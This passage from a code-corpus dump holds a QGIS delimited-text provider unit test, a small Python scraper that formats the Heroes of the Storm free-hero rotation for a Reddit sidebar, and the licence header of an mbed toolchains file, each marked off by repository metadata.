TEST_DATA_DIR = unitTestDataPath()
geomkey = "#geometry"
fidkey = "#fid"
try:
# Qt 5
from qgis.PyQt.QtCore import QUrlQuery
class MyUrl:
def __init__(self, url):
self.url = url
self.query = QUrlQuery()
@classmethod
def fromLocalFile(cls, filename):
return cls(QUrl.fromLocalFile(filename))
def addQueryItem(self, k, v):
self.query.addQueryItem(k, v)
def toString(self):
urlstr = self.url.toString()
querystr = self.query.toString(QUrl.FullyDecoded)
if querystr != '':
urlstr += '?'
urlstr += querystr
return urlstr
except:
MyUrl = QUrl
def normalize_query_items_order(s):
split_url = s.split('?')
urlstr = split_url[0]
if len(split_url) == 2:
items_list = split_url[1].split('&')
items_map = {}
for item in items_list:
split_item = item.split('=')
items_map[split_item[0]] = split_item[1]
first_arg = True
for k in sorted(items_map.keys()):
if first_arg:
urlstr += '?'
first_arg = False
else:
urlstr += '&'
urlstr += k + '=' + items_map[k]
return urlstr
# Thought we could connect to messageReceived signal but doesn't seem to be available
# in python :-( Not sure why?
class MessageLogger(QObject):
def __init__(self, tag=None):
QObject.__init__(self)
self.log = []
self.tag = tag
def __enter__(self):
QgsApplication.messageLog().messageReceived.connect(self.logMessage)
return self
def __exit__(self, type, value, traceback):
QgsApplication.messageLog().messageReceived.disconnect(self.logMessage)
def logMessage(self, msg, tag, level):
if tag == self.tag or not self.tag:
self.log.append(str(msg))
def messages(self):
return self.log
class TestQgsDelimitedTextProviderXY(unittest.TestCase, ProviderTestCase):
@classmethod
def setUpClass(cls):
"""Run before all tests"""
# Create test layer
srcpath = os.path.join(TEST_DATA_DIR, 'provider')
cls.basetestfile = os.path.join(srcpath, 'delimited_xy.csv')
url = MyUrl.fromLocalFile(cls.basetestfile)
url.addQueryItem("crs", "epsg:4326")
url.addQueryItem("type", "csv")
url.addQueryItem("xField", "X")
url.addQueryItem("yField", "Y")
url.addQueryItem("spatialIndex", "no")
url.addQueryItem("subsetIndex", "no")
url.addQueryItem("watchFile", "no")
cls.vl = QgsVectorLayer(url.toString(), 'test', 'delimitedtext')
assert cls.vl.isValid(), "{} is invalid".format(cls.basetestfile)
cls.source = cls.vl.dataProvider()
@classmethod
def tearDownClass(cls):
"""Run after all tests"""
def treat_time_as_string(self):
return False
def treat_date_as_string(self):
return False
def treat_datetime_as_string(self):
return False
class TestQgsDelimitedTextProviderWKT(unittest.TestCase, ProviderTestCase):
@classmethod
def setUpClass(cls):
"""Run before all tests"""
# Create test layer
srcpath = os.path.join(TEST_DATA_DIR, 'provider')
cls.basetestfile = os.path.join(srcpath, 'delimited_wkt.csv')
url = MyUrl.fromLocalFile(cls.basetestfile)
url.addQueryItem("crs", "epsg:4326")
url.addQueryItem("type", "csv")
url.addQueryItem("wktField", "wkt")
url.addQueryItem("spatialIndex", "no")
url.addQueryItem("subsetIndex", "no")
url.addQueryItem("watchFile", "no")
cls.vl = QgsVectorLayer(url.toString(), 'test', 'delimitedtext')
assert cls.vl.isValid(), "{} is invalid".format(cls.basetestfile)
cls.source = cls.vl.dataProvider()
cls.basetestpolyfile = os.path.join(srcpath, 'delimited_wkt_poly.csv')
url = MyUrl.fromLocalFile(cls.basetestpolyfile)
url.addQueryItem("crs", "epsg:4326")
url.addQueryItem("type", "csv")
url.addQueryItem("wktField", "wkt")
url.addQueryItem("spatialIndex", "no")
url.addQueryItem("subsetIndex", "no")
url.addQueryItem("watchFile", "no")
cls.vl_poly = QgsVectorLayer(url.toString(), 'test_polygon', 'delimitedtext')
assert cls.vl_poly.isValid(), "{} is invalid".format(cls.basetestpolyfile)
cls.poly_provider = cls.vl_poly.dataProvider()
@classmethod
def tearDownClass(cls):
"""Run after all tests"""
def treat_time_as_string(self):
return False
def treat_date_as_string(self):
return False
def treat_datetime_as_string(self):
return False
class TestQgsDelimitedTextProviderOther(unittest.TestCase):
@classmethod
def setUpClass(cls):
"""Run before all tests"""
# toggle full ctest output to debug flaky CI test
print('CTEST_FULL_OUTPUT')
def layerData(self, layer, request={}, offset=0):
# Retrieve the data for a layer
first = True
data = {}
fields = []
fieldTypes = []
fr = QgsFeatureRequest()
if request:
if 'exact' in request and request['exact']:
fr.setFlags(QgsFeatureRequest.ExactIntersect)
if 'nogeom' in request and request['nogeom']:
fr.setFlags(QgsFeatureRequest.NoGeometry)
if 'fid' in request:
fr.setFilterFid(request['fid'])
elif 'extents' in request:
fr.setFilterRect(QgsRectangle(*request['extents']))
if 'attributes' in request:
fr.setSubsetOfAttributes(request['attributes'])
# IMPORTANT - we do not use `for f in layer.getFeatures(fr):` as we need
# to verify that existing attributes and geometry are correctly cleared
# from the feature when calling nextFeature()
it = layer.getFeatures(fr)
f = QgsFeature()
while it.nextFeature(f):
if first:
first = False
for field in f.fields():
fields.append(str(field.name()))
fieldTypes.append(str(field.typeName()))
fielddata = dict((name, str(f[name])) for name in fields)
g = f.geometry()
if not g.isNull():
fielddata[geomkey] = str(g.asWkt())
else:
fielddata[geomkey] = "None"
fielddata[fidkey] = f.id()
id = fielddata[fields[0]]
description = fielddata[fields[1]]
fielddata['id'] = id
fielddata['description'] = description
data[f.id() + offset] = fielddata
if 'id' not in fields:
fields.insert(0, 'id')
if 'description' not in fields:
fields.insert(1, 'description')
fields.append(fidkey)
fields.append(geomkey)
return fields, fieldTypes, data
def delimitedTextData(self, testname, filename, requests, verbose, **params):
# Retrieve the data for a delimited text url
# Create a layer for the specified file and query parameters
# and return the data for the layer (fields, data)
filepath = os.path.join(unitTestDataPath("delimitedtext"), filename)
url = MyUrl.fromLocalFile(filepath)
if not requests:
requests = [{}]
for k in list(params.keys()):
url.addQueryItem(k, params[k])
urlstr = url.toString()
log = []
with MessageLogger('DelimitedText') as logger:
if verbose:
print(testname)
layer = QgsVectorLayer(urlstr, 'test', 'delimitedtext')
# decodeUri / encodeUri check
self.assertTrue(compareUrl(layer.source(), QgsProviderRegistry.instance().encodeUri('delimitedtext', QgsProviderRegistry.instance().decodeUri('delimitedtext', layer.source()))))
uri = layer.dataProvider().dataSourceUri()
if verbose:
print(uri)
basename = os.path.basename(filepath)
if not basename.startswith('test'):
basename = 'file'
uri = re.sub(r'^file\:\/\/[^\?]*', 'file://' + basename, uri)
fields = []
fieldTypes = []
data = {}
if layer.isValid():
for nr, r in enumerate(requests):
if verbose:
print(("Processing request", nr + 1, repr(r)))
if isinstance(r, Callable):
r(layer)
if verbose:
print("Request function executed")
if isinstance(r, Callable):
continue
rfields, rtypes, rdata = self.layerData(layer, r, nr * 1000)
if len(rfields) > len(fields):
fields = rfields
fieldTypes = rtypes
data.update(rdata)
if not rdata:
log.append("Request " + str(nr) + " did not return any data")
if verbose:
print(("Request returned", len(list(rdata.keys())), "features"))
for msg in logger.messages():
filelogname = 'temp_file' if 'tmp' in filename.lower() else filename
msg = re.sub(r'file\s+.*' + re.escape(filename), 'file ' + filelogname, msg)
msg = msg.replace(filepath, filelogname)
log.append(msg)
return dict(fields=fields, fieldTypes=fieldTypes, data=data, log=log, uri=uri, geometryType=layer.geometryType())
def printWanted(self, testname, result):
# Routine to export the result as a function definition
print()
print(("def {0}():".format(testname)))
data = result['data']
log = result['log']
fields = result['fields']
prefix = ' '
# Dump the data for a layer - used to construct unit tests
print((prefix + "wanted={}"))
print((prefix + "wanted['uri']=" + repr(result['uri'])))
print((prefix + "wanted['fieldTypes']=" + repr(result['fieldTypes'])))
print((prefix + "wanted['geometryType']=" + repr(result['geometryType'])))
print((prefix + "wanted['data']={"))
for k in sorted(data.keys()):
row = data[k]
print((prefix + " {0}: {{".format(repr(k))))
for f in fields:
print((prefix + " " + repr(f) + ": " + repr(row[f]) + ","))
print((prefix + " },"))
print((prefix + " }"))
print((prefix + "wanted['log']=["))
for msg in log:
print((prefix + ' ' + repr(msg) + ','))
print((prefix + ' ]'))
print(' return wanted')
print('', flush=True)
def recordDifference(self, record1, record2):
# Compare a record defined as a dictionary
for k in list(record1.keys()):
if k not in record2:
return "Field {0} is missing".format(k)
r1k = record1[k]
r2k = record2[k]
if k == geomkey:
if not compareWkt(r1k, r2k):
return "Geometry differs: {0:.50} versus {1:.50}".format(r1k, r2k)
else:
if record1[k] != record2[k]:
return "Field {0} differs: {1:.50} versus {2:.50}".format(k, repr(r1k), repr(r2k))
for k in list(record2.keys()):
if k not in record1:
return "Output contains extra field {0}".format(k)
return ''
def runTest(self, file, requests, **params):
testname = inspect.stack()[1][3]
verbose = not rebuildTests
if verbose:
print(("Running test:", testname))
result = self.delimitedTextData(testname, file, requests, verbose, **params)
if rebuildTests:
self.printWanted(testname, result)
assert False, "Test not run - being rebuilt"
try:
wanted = eval('want.{0}()'.format(testname))
except:
self.printWanted(testname, result)
assert False, "Test results not available for {0}".format(testname)
data = result['data']
log = result['log']
failures = []
if normalize_query_items_order(result['uri']) != normalize_query_items_order(wanted['uri']):
msg = "Layer Uri ({0}) doesn't match expected ({1})".format(
normalize_query_items_order(result['uri']), normalize_query_items_order(wanted['uri']))
print((' ' + msg))
failures.append(msg)
if result['fieldTypes'] != wanted['fieldTypes']:
msg = "Layer field types ({0}) doesn't match expected ({1})".format(
result['fieldTypes'], wanted['fieldTypes'])
failures.append(msg)
if result['geometryType'] != wanted['geometryType']:
msg = "Layer geometry type ({0}) doesn't match expected ({1})".format(
result['geometryType'], wanted['geometryType'])
failures.append(msg)
wanted_data = wanted['data']
for id in sorted(wanted_data.keys()):
print('getting wanted data')
wrec = wanted_data[id]
print('getting received data')
trec = data.get(id, {})
print('getting description')
description = wrec['description']
print('getting difference')
difference = self.recordDifference(wrec, trec)
if not difference:
print((' {0}: Passed'.format(description)))
else:
print((' {0}: {1}'.format(description, difference)))
failures.append(description + ': ' + difference)
for id in sorted(data.keys()):
if id not in wanted_data:
msg = "Layer contains unexpected extra data with id: \"{0}\"".format(id)
print((' ' + msg))
failures.append(msg)
common = []
log_wanted = wanted['log']
for l in log:
if l in log_wanted:
common.append(l)
for l in log_wanted:
if l not in common:
msg = 'Missing log message: ' + l
print((' ' + msg))
failures.append(msg)
for l in log:
if l not in common:
msg = 'Extra log message: ' + l
print((' ' + msg))
failures.append(msg)
if len(log) == len(common) and len(log_wanted) == len(common):
print(' Message log correct: Passed')
if failures:
self.printWanted(testname, result)
assert len(failures) == 0, "\n".join(failures)
def test_001_provider_defined(self):
registry = QgsProviderRegistry.instance()
metadata = registry.providerMetadata('delimitedtext')
assert metadata is not None, "Delimited text provider is not installed"
def test_002_load_csv_file(self):
# CSV file parsing
filename = 'test.csv'
params = {'geomType': 'none', 'type': 'csv'}
requests = None
self.runTest(filename, requests, **params)
def test_003_field_naming(self):
# Management of missing/duplicate/invalid field names
filename = 'testfields.csv'
params = {'geomType': 'none', 'type': 'csv'}
requests = None
self.runTest(filename, requests, **params)
def test_004_max_fields(self):
# Limiting maximum number of fields
filename = 'testfields.csv'
params = {'geomType': 'none', 'maxFields': '7', 'type': 'csv'}
requests = None
self.runTest(filename, requests, **params)
def test_005_load_whitespace(self):
# Whitespace file parsing
filename = 'test.space'
params = {'geomType': 'none', 'type': 'whitespace'}
requests = None
self.runTest(filename, requests, **params)
def test_006_quote_escape(self):
# Quote and escape file parsing
filename = 'test.pipe'
params = {'geomType': 'none', 'quote': '"', 'delimiter': '|', 'escape': '\\'}
requests = None
self.runTest(filename, requests, **params)
def test_007_multiple_quote(self):
# Multiple quote and escape characters
filename = 'test.quote'
params = {'geomType': 'none', 'quote': '\'"', 'type': 'csv', 'escape': '"\''}
requests = None
self.runTest(filename, requests, **params)
def test_008_badly_formed_quotes(self):
# Badly formed quoted fields
filename = 'test.badquote'
params = {'geomType': 'none', 'quote': '"', 'type': 'csv', 'escape': '"'}
requests = None
self.runTest(filename, requests, **params)
def test_009_skip_lines(self):
# Skip lines
filename = 'test2.csv'
params = {'geomType': 'none', 'useHeader': 'no', 'type': 'csv', 'skipLines': '2'}
requests = None
self.runTest(filename, requests, **params)
def test_010_read_coordinates(self):
# Skip lines
filename = 'testpt.csv'
params = {'yField': 'geom_y', 'xField': 'geom_x', 'type': 'csv'}
requests = None
self.runTest(filename, requests, **params)
def test_011_read_wkt(self):
# Reading WKT geometry field
filename = 'testwkt.csv'
params = {'delimiter': '|', 'type': 'csv', 'wktField': 'geom_wkt'}
requests = None
self.runTest(filename, requests, **params)
def test_012_read_wkt_point(self):
# Read WKT points
filename = 'testwkt.csv'
params = {'geomType': 'point', 'delimiter': '|', 'type': 'csv', 'wktField': 'geom_wkt'}
requests = None
self.runTest(filename, requests, **params)
def test_013_read_wkt_line(self):
# Read WKT linestrings
filename = 'testwkt.csv'
params = {'geomType': 'line', 'delimiter': '|', 'type': 'csv', 'wktField': 'geom_wkt'}
requests = None
self.runTest(filename, requests, **params)
def test_014_read_wkt_polygon(self):
# Read WKT polygons
filename = 'testwkt.csv'
params = {'geomType': 'polygon', 'delimiter': '|', 'type': 'csv', 'wktField': 'geom_wkt'}
requests = None
self.runTest(filename, requests, **params)
def test_015_read_dms_xy(self):
# Reading degrees/minutes/seconds angles
filename = 'testdms.csv'
params = {'yField': 'lat', 'xField': 'lon', 'type': 'csv', 'xyDms': 'yes'}
requests = None
self.runTest(filename, requests, **params)
def test_016_decimal_point(self):
# Reading degrees/minutes/seconds angles
filename = 'testdp.csv'
params = {'yField': 'geom_y', 'xField': 'geom_x', 'type': 'csv', 'delimiter': ';', 'decimalPoint': ','}
requests = None
self.runTest(filename, requests, **params)
def test_017_regular_expression_1(self):
# Parsing regular expression delimiter
filename = 'testre.txt'
params = {'geomType': 'none', 'trimFields': 'Y', 'delimiter': 'RE(?:GEXP)?', 'type': 'regexp'}
requests = None
self.runTest(filename, requests, **params)
def test_018_regular_expression_2(self):
# Parsing regular expression delimiter with capture groups
filename = 'testre.txt'
params = {'geomType': 'none', 'trimFields': 'Y', 'delimiter': '(RE)(GEXP)?', 'type': 'regexp'}
requests = None
self.runTest(filename, requests, **params)
def test_019_regular_expression_3(self):
# Parsing anchored regular expression
filename = 'testre2.txt'
params = {'geomType': 'none', 'trimFields': 'Y', 'delimiter': '^(.{5})(.{30})(.{5,})', 'type': 'regexp'}
requests = None
self.runTest(filename, requests, **params)
def test_020_regular_expression_4(self):
# Parsing zero length re
filename = 'testre3.txt'
params = {'geomType': 'none', 'delimiter': 'x?', 'type': 'regexp'}
requests = None
self.runTest(filename, requests, **params)
def test_021_regular_expression_5(self):
# Parsing zero length re 2
filename = 'testre3.txt'
params = {'geomType': 'none', 'delimiter': '\\b', 'type': 'regexp'}
requests = None
self.runTest(filename, requests, **params)
def test_022_utf8_encoded_file(self):
# UTF8 encoded file test
filename = 'testutf8.csv'
params = {'geomType': 'none', 'delimiter': '|', 'type': 'csv', 'encoding': 'utf-8'}
requests = None
self.runTest(filename, requests, **params)
def test_023_latin1_encoded_file(self):
# Latin1 encoded file test
filename = 'testlatin1.csv'
params = {'geomType': 'none', 'delimiter': '|', 'type': 'csv', 'encoding': 'latin1'}
requests = None
self.runTest(filename, requests, **params)
def test_024_filter_rect_xy(self):
# Filter extents on XY layer
filename = 'testextpt.txt'
params = {'yField': 'y', 'delimiter': '|', 'type': 'csv', 'xField': 'x'}
requests = [
{'extents': [10, 30, 30, 50]},
{'extents': [10, 30, 30, 50], 'exact': 1},
{'extents': [110, 130, 130, 150]}]
self.runTest(filename, requests, **params)
def test_025_filter_rect_wkt(self):
# Filter extents on WKT layer
filename = 'testextw.txt'
params = {'delimiter': '|', 'type': 'csv', 'wktField': 'wkt'}
requests = [
{'extents': [10, 30, 30, 50]},
{'extents': [10, 30, 30, 50], 'exact': 1},
{'extents': [110, 130, 130, 150]}]
self.runTest(filename, requests, **params)
def test_026_filter_fid(self):
# Filter on feature id
filename = 'test.csv'
params = {'geomType': 'none', 'type': 'csv'}
requests = [
{'fid': 3},
{'fid': 9},
{'fid': 20},
{'fid': 3}]
self.runTest(filename, requests, **params)
def test_027_filter_attributes(self):
# Filter on attributes
filename = 'test.csv'
params = {'geomType': 'none', 'type': 'csv'}
requests = [
{'attributes': [1, 3]},
{'fid': 9},
{'attributes': [1, 3], 'fid': 9},
{'attributes': [3, 1], 'fid': 9},
{'attributes': [1, 3, 7], 'fid': 9},
{'attributes': [], 'fid': 9}]
self.runTest(filename, requests, **params)
def test_028_substring_test(self):
# CSV file parsing
filename = 'test.csv'
params = {'geomType': 'none', 'subset': 'id % 2 = 1', 'type': 'csv'}
requests = None
self.runTest(filename, requests, **params)
def test_029_file_watcher(self):
# Testing file watcher
(filehandle, filename) = tempfile.mkstemp()
if os.name == "nt":
filename = filename.replace("\\", "/")
with os.fdopen(filehandle, "w") as f:
f.write("id,name\n1,rabbit\n2,pooh\n")
def appendfile(layer):
with open(filename, 'a') as f:
f.write('3,tiger\n')
# print "Appended to file - sleeping"
time.sleep(1)
QCoreApplication.instance().processEvents()
def rewritefile(layer):
with open(filename, 'w') as f:
f.write("name,size,id\ntoad,small,5\nmole,medium,6\nbadger,big,7\n")
# print "Rewritten file - sleeping"
time.sleep(1)
QCoreApplication.instance().processEvents()
def deletefile(layer):
try:
os.remove(filename)
except:
open(filename, "w").close()
assert os.path.getsize(filename) == 0, "removal and truncation of {} failed".format(filename)
# print "Deleted file - sleeping"
time.sleep(1)
QCoreApplication.instance().processEvents()
params = {'geomType': 'none', 'type': 'csv', 'watchFile': 'yes'}
requests = [
{'fid': 3},
{},
{'fid': 7},
appendfile,
{'fid': 3},
{'fid': 4},
{},
{'fid': 7},
rewritefile,
{'fid': 2},
{},
{'fid': 7},
deletefile,
{'fid': 2},
{},
rewritefile,
{'fid': 2},
]
self.runTest(filename, requests, **params)
def test_030_filter_rect_xy_spatial_index(self):
# Filter extents on XY layer with spatial index
filename = 'testextpt.txt'
params = {'yField': 'y', 'delimiter': '|', 'type': 'csv', 'xField': 'x', 'spatialIndex': 'Y'}
requests = [
{'extents': [10, 30, 30, 50]},
{'extents': [10, 30, 30, 50], 'exact': 1},
{'extents': [110, 130, 130, 150]},
{},
{'extents': [-1000, -1000, 1000, 1000]}
]
self.runTest(filename, requests, **params)
def test_031_filter_rect_wkt_spatial_index(self):
# Filter extents on WKT layer with spatial index
filename = 'testextw.txt'
params = {'delimiter': '|', 'type': 'csv', 'wktField': 'wkt', 'spatialIndex': 'Y'}
requests = [
{'extents': [10, 30, 30, 50]},
{'extents': [10, 30, 30, 50], 'exact': 1},
{'extents': [110, 130, 130, 150]},
{},
{'extents': [-1000, -1000, 1000, 1000]}
]
self.runTest(filename, requests, **params)
def test_032_filter_rect_wkt_create_spatial_index(self):
# Filter extents on WKT layer building spatial index
filename = 'testextw.txt'
params = {'delimiter': '|', 'type': 'csv', 'wktField': 'wkt'}
requests = [
{'extents': [10, 30, 30, 50]},
{},
lambda layer: layer.dataProvider().createSpatialIndex(),
{'extents': [10, 30, 30, 50]},
{'extents': [10, 30, 30, 50], 'exact': 1},
{'extents': [110, 130, 130, 150]},
{},
{'extents': [-1000, -1000, 1000, 1000]}
]
self.runTest(filename, requests, **params)
def test_033_reset_subset_string(self):
# CSV file parsing
filename = 'test.csv'
params = {'geomType': 'none', 'type': 'csv'}
requests = [
{},
lambda layer: layer.dataProvider().setSubsetString("id % 2 = 1", True),
{},
lambda layer: layer.dataProvider().setSubsetString("id = 6", False),
{},
lambda layer: layer.dataProvider().setSubsetString("id = 3", False),
{},
lambda layer: layer.dataProvider().setSubsetString("id % 2 = 1", True),
{},
lambda layer: layer.dataProvider().setSubsetString("id % 2 = 0", True),
{},
]
self.runTest(filename, requests, **params)
def test_034_csvt_file(self):
# CSVT field types
filename = 'testcsvt.csv'
params = {'geomType': 'none', 'type': 'csv'}
requests = None
self.runTest(filename, requests, **params)
def test_035_csvt_file2(self):
# CSV field types 2
filename = 'testcsvt2.txt'
params = {'geomType': 'none', 'type': 'csv', 'delimiter': '|'}
requests = None
self.runTest(filename, requests, **params)
def test_036_csvt_file_invalid_types(self):
# CSV field types invalid string format
filename = 'testcsvt3.csv'
params = {'geomType': 'none', 'type': 'csv'}
requests = None
self.runTest(filename, requests, **params)
def test_037_csvt_file_invalid_file(self):
# CSV field types invalid file
filename = 'testcsvt4.csv'
params = {'geomType': 'none', 'type': 'csv'}
requests = None
self.runTest(filename, requests, **params)
def test_038_type_inference(self):
# Skip lines
filename = 'testtypes.csv'
params = {'yField': 'lat', 'xField': 'lon', 'type': 'csv'}
requests = None
self.runTest(filename, requests, **params)
def test_039_issue_13749(self):
# First record contains missing geometry
filename = 'test13749.csv'
params = {'yField': 'geom_y', 'xField': 'geom_x', 'type': 'csv'}
requests = None
self.runTest(filename, requests, **params)
def test_040_issue_14666(self):
# x/y containing some null geometries
filename = 'test14666.csv'
params = {'yField': 'y', 'xField': 'x', 'type': 'csv', 'delimiter': '\\t'}
requests = None
self.runTest(filename, requests, **params)
def test_041_no_detect_type(self):
# CSV file parsing
# Skip lines
filename = 'testtypes.csv'
params = {'yField': 'lat', 'xField': 'lon', 'type': 'csv', 'detectTypes': 'no'}
requests = None
self.runTest(filename, requests, **params)
def test_042_no_detect_types_csvt(self):
# CSVT field types
filename = 'testcsvt.csv'
params = {'geomType': 'none', 'type': 'csv', 'detectTypes': 'no'}
requests = None
self.runTest(filename, requests, **params)
def test_043_decodeuri(self):
# URI decoding
filename = '/home/to/path/test.csv'
uri = 'file://{}?geomType=none'.format(filename)
registry = QgsProviderRegistry.instance()
components = registry.decodeUri('delimitedtext', uri)
self.assertEqual(components['path'], filename)
def test_044_ZM(self):
# Create test layer
srcpath = os.path.join(TEST_DATA_DIR, 'provider')
basetestfile = os.path.join(srcpath, 'delimited_xyzm.csv')
url = MyUrl.fromLocalFile(basetestfile)
url.addQueryItem("crs", "epsg:4326")
url.addQueryItem("type", "csv")
url.addQueryItem("xField", "X")
url.addQueryItem("yField", "Y")
url.addQueryItem("zField", "Z")
url.addQueryItem("mField", "M")
url.addQueryItem("spatialIndex", "no")
url.addQueryItem("subsetIndex", "no")
url.addQueryItem("watchFile", "no")
vl = QgsVectorLayer(url.toString(), 'test', 'delimitedtext')
assert vl.isValid(), "{} is invalid".format(basetestfile)
assert vl.wkbType() == QgsWkbTypes.PointZM, "wrong wkb type, should be PointZM"
assert vl.getFeature(2).geometry().asWkt() == "PointZM (-71.12300000000000466 78.23000000000000398 1 2)", "wrong PointZM geometry"
def test_045_Z(self):
# Create test layer
srcpath = os.path.join(TEST_DATA_DIR, 'provider')
basetestfile = os.path.join(srcpath, 'delimited_xyzm.csv')
url = MyUrl.fromLocalFile(basetestfile)
url.addQueryItem("crs", "epsg:4326")
url.addQueryItem("type", "csv")
url.addQueryItem("xField", "X")
url.addQueryItem("yField", "Y")
url.addQueryItem("zField", "Z")
url.addQueryItem("spatialIndex", "no")
url.addQueryItem("subsetIndex", "no")
url.addQueryItem("watchFile", "no")
vl = QgsVectorLayer(url.toString(), 'test', 'delimitedtext')
assert vl.isValid(), "{} is invalid".format(basetestfile)
assert vl.wkbType() == QgsWkbTypes.PointZ, "wrong wkb type, should be PointZ"
assert vl.getFeature(2).geometry().asWkt() == "PointZ (-71.12300000000000466 78.23000000000000398 1)", "wrong PointZ geometry"
def test_046_M(self):
# Create test layer
srcpath = os.path.join(TEST_DATA_DIR, 'provider')
basetestfile = os.path.join(srcpath, 'delimited_xyzm.csv')
url = MyUrl.fromLocalFile(basetestfile)
url.addQueryItem("crs", "epsg:4326")
url.addQueryItem("type", "csv")
url.addQueryItem("xField", "X")
url.addQueryItem("yField", "Y")
url.addQueryItem("mField", "M")
url.addQueryItem("spatialIndex", "no")
url.addQueryItem("subsetIndex", "no")
url.addQueryItem("watchFile", "no")
vl = QgsVectorLayer(url.toString(), 'test', 'delimitedtext')
assert vl.isValid(), "{} is invalid".format(basetestfile)
assert vl.wkbType() == QgsWkbTypes.PointM, "wrong wkb type, should be PointM"
assert vl.getFeature(2).geometry().asWkt() == "PointM (-71.12300000000000466 78.23000000000000398 2)", "wrong PointM geometry"
def test_047_datetime(self):
# Create test layer
srcpath = os.path.join(TEST_DATA_DIR, 'provider')
basetestfile = os.path.join(srcpath, 'delimited_datetime.csv')
url = MyUrl.fromLocalFile(basetestfile)
url.addQueryItem("crs", "epsg:4326")
url.addQueryItem("type", "csv")
url.addQueryItem("xField", "X")
url.addQueryItem("yField", "Y")
url.addQueryItem("spatialIndex", "no")
url.addQueryItem("subsetIndex", "no")
url.addQueryItem("watchFile", "no")
vl = QgsVectorLayer(url.toString(), 'test', 'delimitedtext')
assert vl.isValid(), "{} is invalid".format(basetestfile)
assert vl.fields().at(4).type() == QVariant.DateTime
assert vl.fields().at(5).type() == QVariant.Date
assert vl.fields().at(6).type() == QVariant.Time
assert vl.fields().at(9).type() == QVariant.String
def testSpatialIndex(self):
srcpath = os.path.join(TEST_DATA_DIR, 'provider')
basetestfile = os.path.join(srcpath, 'delimited_xyzm.csv')
url = MyUrl.fromLocalFile(basetestfile)
url.addQueryItem("crs", "epsg:4326")
url.addQueryItem("type", "csv")
url.addQueryItem("xField", "X")
url.addQueryItem("yField", "Y")
url.addQueryItem("spatialIndex", "no")
vl = QgsVectorLayer(url.toString(), 'test', 'delimitedtext')
self.assertTrue(vl.isValid())
self.assertEqual(vl.hasSpatialIndex(), QgsFeatureSource.SpatialIndexNotPresent)
vl.dataProvider().createSpatialIndex()
self.assertEqual(vl.hasSpatialIndex(), QgsFeatureSource.SpatialIndexPresent)
def testEncodeuri(self):
# URI decoding
filename = '/home/to/path/test.csv'
registry = QgsProviderRegistry.instance()
parts = {'path': filename}
uri = registry.encodeUri('delimitedtext', parts)
self.assertEqual(uri, 'file://' + filename)
def testCREndOfLineAndWorkingBuffer(self):
# Test CSV file with \r (CR) endings
# Test also that the logic to refill the buffer works properly
os.environ['QGIS_DELIMITED_TEXT_FILE_BUFFER_SIZE'] = '17'
try:
basetestfile = os.path.join(unitTestDataPath("delimitedtext"), 'test_cr_end_of_line.csv')
url = MyUrl.fromLocalFile(basetestfile)
url.addQueryItem("type", "csv")
url.addQueryItem("geomType", "none")
vl = QgsVectorLayer(url.toString(), 'test', 'delimitedtext')
assert vl.isValid(), "{} is invalid".format(basetestfile)
fields = vl.fields()
self.assertEqual(len(fields), 2)
self.assertEqual(fields[0].name(), 'col0')
self.assertEqual(fields[1].name(), 'col1')
features = [f for f in vl.getFeatures()]
self.assertEqual(len(features), 2)
self.assertEqual(features[0]['col0'], 'value00')
self.assertEqual(features[0]['col1'], 'value01')
self.assertEqual(features[1]['col0'], 'value10')
self.assertEqual(features[1]['col1'], 'value11')
finally:
del os.environ['QGIS_DELIMITED_TEXT_FILE_BUFFER_SIZE']
def testSaturationOfWorkingBuffer(self):
# 10 bytes is sufficient to detect the header line, but not enough for the
# first record
os.environ['QGIS_DELIMITED_TEXT_FILE_BUFFER_SIZE'] = '10'
try:
basetestfile = os.path.join(unitTestDataPath("delimitedtext"), 'test_cr_end_of_line.csv')
url = MyUrl.fromLocalFile(basetestfile)
url.addQueryItem("type", "csv")
url.addQueryItem("geomType", "none")
vl = QgsVectorLayer(url.toString(), 'test', 'delimitedtext')
assert vl.isValid(), "{} is invalid".format(basetestfile)
fields = vl.fields()
self.assertEqual(len(fields), 2)
self.assertEqual(fields[0].name(), 'col0')
self.assertEqual(fields[1].name(), 'col1')
features = [f for f in vl.getFeatures()]
self.assertEqual(len(features), 1)
self.assertEqual(features[0]['col0'], 'value00')
self.assertEqual(features[0]['col1'], 'va') # truncated
finally:
del os.environ['QGIS_DELIMITED_TEXT_FILE_BUFFER_SIZE']
if __name__ == '__main__':
unittest.main()
| gpl-2.0 |
rhots/automation | automation/rotation.py | 1 | 2732 | from bs4 import BeautifulSoup
import requests
from .hero import Hero
class Rotation:
"""Rotation is able to get the latest free hero rotation."""
FORUM_URL = "https://us.battle.net/heroes/en/forum/topic/17936383460"
# TODO: omg get this outta here
SECOND_SPRITESHEET_HEROES = ["Samuro", "Ragnaros", "Varian", "Zul'jin", "Valeera", "Lúcio"]
def __init__(self):
pass
def get_rotation(self):
html = requests.get(self.FORUM_URL).text
soup = BeautifulSoup(html, "html.parser")
post = soup.select("div.TopicPost-bodyContent")[0]
header = post.span.text
date = header.split("Rotation: ")[-1]
heroes = [self._remove_slot_text(li.text) for li in post.find_all("li")]
heroes = [Hero(name) for name in heroes]
return date, heroes
# TODO: omg get this outta here
def sidebar_text(self):
"""We want the sidebar text to be formatted like the following:
* spacer
* 3 heroes
* spacer
* 4 heroes
* spacer
* 3 heroes
* spacer
* bottom
"""
_, heroes = self.get_rotation()
formatted_heroes = [self._format_hero(h) for h in heroes]
spacer = "[](#spacer)"
bottom = "[](#bottom)"
# This could be more concise using inserts, but this seems to
# be the clearest method for future readers.
final_line_items = [spacer]
final_line_items += formatted_heroes[:3]
final_line_items += [spacer]
final_line_items += formatted_heroes[3:7]
final_line_items += [spacer]
final_line_items += formatted_heroes[7:10]
final_line_items += [spacer]
final_line_items += [bottom]
return "\n".join(final_line_items)
def _format_hero(self, hero):
"""_format_hero formats a hero's name into a line item in
the sidebar's free rotation."""
bnet_slug = hero.battle_net_slug()
css_id = hero.css_id()
# Reddit's stylesheet images have a limited size, so we have
# more than one spritesheet providing the rotation icons.
sheet_suffix = "2" if self._needs_second_sheet(hero) else ""
format_str = "[](http://us.battle.net/heroes/en/heroes/{0}/#free_rotation{1}#{2})"
return format_str.format(
bnet_slug,
sheet_suffix,
css_id)
def _remove_slot_text(self, s):
if "Slot unlocked at" not in s:
return s
return s.split(" (Slot unlocked at")[0]
# TODO: omg get this outta here
def _needs_second_sheet(self, hero):
return hero.name in self.SECOND_SPRITESHEET_HEROES
| isc |
GustavWi/mbed | workspace_tools/toolchains/__init__.py | 18 | 25949 | """
mbed SDK
Copyright (c) 2011-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
